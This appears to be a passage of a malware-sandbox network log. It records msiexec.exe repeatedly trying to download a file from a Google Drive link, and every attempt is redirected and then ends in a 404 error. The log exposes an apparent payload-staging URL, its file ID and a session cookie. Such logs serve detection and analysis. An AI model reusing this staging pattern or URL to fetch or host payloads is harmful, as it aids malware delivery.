                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CE37CgZyzFhVKm9Gv4jeDQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:11 UTC111INData Raw: 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ts an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.449730216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:14 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:15 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:15 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-1_-dz1COsmvBzpR7BW6geA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.449731142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:17 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:18 UTC1534INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyItvr43sqFEK18D-MIvr7_JOqqafiMAAvD_0w3qSTROtbcbgoEYNK3g6a4bsjpvxZDnP
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:18 GMT
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-iQwA3_V-zkBtV6BudbnVRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:18 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 74 76 48 36 67 36 73 6b 78 2d 74 2d 63 6b 78 2d 68 4a 6a 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UtvH6g6skx-t-ckx-hJjcA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:18 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.449732216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:20 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:21 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:21 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-soYRFxpV3YSljxfUr5doFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.449733142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:23 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:24 UTC1533INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyItVP6KBCJiYnnOULBs6eXNzoUNh4SL6Vbi6KFTpmIkgw7MpOSWQ54ZQgSxZh5KRwJo
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:24 GMT
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-YZFBQuBGiBlM1orMALjLnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:24 UTC1533INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 5f 64 7a 67 58 6f 33 4f 69 5a 6f 68 6f 49 32 77 38 52 62 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L_dzgXo3OiZohoI2w8Rbow">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:24 UTC119INData Raw: 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.449734216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:27 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:28 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:27 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-3SPWfDHpfxVyVVOJGfsnOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.449735142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:30 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:31 UTC1534INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIvYwCVZxydY2udRoMitiYkCKNVVrLFFopZAcWrzVGvK-oHqO3m3QwGH94l8LpO8I9iK
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:30 GMT
                                                                        Content-Security-Policy: script-src 'nonce-HT1WniQf0xtBizMk7m7kpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:31 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 50 4b 78 65 47 74 77 52 41 30 6c 4d 51 5f 4a 64 50 6c 77 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OPKxeGtwRA0lMQ_JdPlwTw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:31 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.449736216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:33 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:34 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:33 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-ueJTfmeTPxzcWANYXSnMvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.449737142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:37 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:38 UTC1534INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIuNwpgJXkb925lt9bAaJn-vUWDMXE4svscOc1746wY98sbh_s2h8nCf4uNKelxuR8Uj
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:37 GMT
